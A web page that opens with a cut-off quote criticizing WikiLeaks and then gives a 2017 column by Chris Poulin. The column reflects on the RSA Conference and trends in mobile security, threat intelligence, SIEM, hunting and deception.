    “While I agree on having debate on what the government should be able to do and oversight in that, this is something different,” Kennedy said. “To me, this seems extremely aggressive for WikiLeaks, more than I’ve ever seen. This really hurts operations abroad for true hostiles.

    "Truth of the matter is if I was an adversary against the United States, this is exactly what I would do…Burn capabilities globally,” added Kennedy.

  • Poulin: Breaking Down RSA and the Past, Present and Future of Information Security

    by Daniel Maloof | Mar 06, 2017

    Monday, March 6, 2017 By Chris Poulin, IANS Faculty


    Whether you look forward to or dread the RSA Conference each year, it's practically a must-attend event for everyone who’s anyone in information security.

    I’ll admit I’m a fickle attendee: I make my way across the U.S. about once every five years to check out the happenings, then disappointment sets in for a few years before time erases the memory and I start the cycle all over again. This year was a reset year, and it duly confirmed my general cynicism.

    Well, that’s not totally fair. There are definitely a few big reasons to go to the conference, and painting the entire experience with a sarcastic broad brush is unfair. These include, as you might expect:

    • Training and presentations: These can be hit or miss, but there are always some that give good background on a variety of topics, like IPv6 security. Still, as I get older and more impatient, I think I'd rather digest even the well-crafted talks in whitepaper form where I can control the pace.

    • Meetings with clients, prospects, partners and analysts: At this point in my career, these meetings in hotel suites and coffee shops around the Moscone Center offer me the most value. 

    • Networking with peers: This is related to the above, but it's about growing your network. This is another big reason I still attend RSA. 

    These factors alone can make attending RSA worthwhile, but then, of course, there's also the expo floor. I have a lot of thoughts on the expo floor at RSA, but to sum it up, I would say this: There are way too many vendors to digest in five days, so the best you can hope for is to get a general sense of the landscape and have a half-dozen meaningful conversations.

    Ultimately, I came away feeling a bit like Scrooge in “A Christmas Carol," but nonetheless, here are my three major takeaways from RSA Conference 2017:

    • The ghost of security past: Mobile security turned out to not be a thing after all. The days of vendors that only focused on mobile security are gone. The major players have been sucked into the gravity of larger institutional planets. Mobile security is now table stakes and relegated to MDM/MAM functions, with containerization, approved app stores and self-service installation. We’ve hit the wall with mobile security hype, and as I’ve predicted many times in the past, there have been no major mobile security breaches that have compromised enterprise data. Maybe that’s a result of early fear and rapid introduction of security tools; maybe the big one just hasn’t hit yet. In any case, there’s nothing to see here, people, move on.

    • The ghost of security present: Threat intelligence and analytics are still being talked about a ton. Everyone is trying to figure out a meaningful use for all that data we’ve been collecting over the last 20 years. Some of it comes from external sources, others from inside the enterprise. Vendors are sucking in data from thousands of paste sites, underground forums and the deep and dark webs. They’re scraping sites and looking for bad signs of compromise or illicit content with which to rate the badness, and they’re watching internet traffic to profile phishing email and spam. For data from inside the organization, the mantra seems to be, “The SIEM is dead; long live the next-generation SIEM!”

    • The ghost of security future: Hunting and deception are starting to capture the interest of more progressive organizations. The trick to hunting is getting the right information at the right time: a balancing act between storing every bit in case it’s needed later and identifying potential attacks in progress so you can take a snapshot in time. The former requires insane amounts of storage, while the latter requires triggers that need to be tuned to reduce false positives and eliminate false negatives. We’ve seen this before with tools like NetWitness (now owned, appropriately, by RSA) and…well, SIEMs. Deception is interesting in that it provides an early warning when attackers start rattling doorknobs during internal surveillance and lateral movement. Some deception tools can even work with IoT devices, such as industrial control and medical equipment.

    Of course, there are also the usual suspects, who’ve been around for years. Think AV, firewalls, and all that “defense-in-depth” stuff. They’re trying to reinvent themselves in light of new trends, but they’re also still stuck in the past with the old chestnuts. The whole experience felt a little like a traveling medicine show on steroids. For all of you millennials out there, you’ll have to Google that reference. Look up snake oil while you’re at it.

    So, finally, after a week of confusing my fitness wearable by clocking more than 15,000 steps per day (where presumably some machine learning algorithm is figuring out my exact date and time of demise), I’m left with the impression that we’re making progress in information security, despite my cantankerous nature.

    However, the positives are hidden in the white noise of marketing. It’s like finding the actual image in those Magic Eye pictures from the 1990s. What I see when I defocus my eyes and stare at the landscape is that we’ve moved from a purely defensive posture to detection, and now we’re starting to employ offensive tactics. Hunting and deception give us the ability to put attackers on the defense as long as they’re on our own turf. I’ll really be impressed, though, when predictive analytics actually predict a future attack. So, for that, I guess I’ll see you at RSA in another five years.

    ***

    Chris Poulin is Director of IoT Security and Threat Intel for Booz-Allen Hamilton's Strategic Initiatives Group, where he is responsible for building countermeasures for threats to the Internet of Things. He has a particular focus on connected vehicles, as well as researching and analyzing security trends in cybercrime, cyber warfare, corporate espionage, hacktivism, and emerging threats.
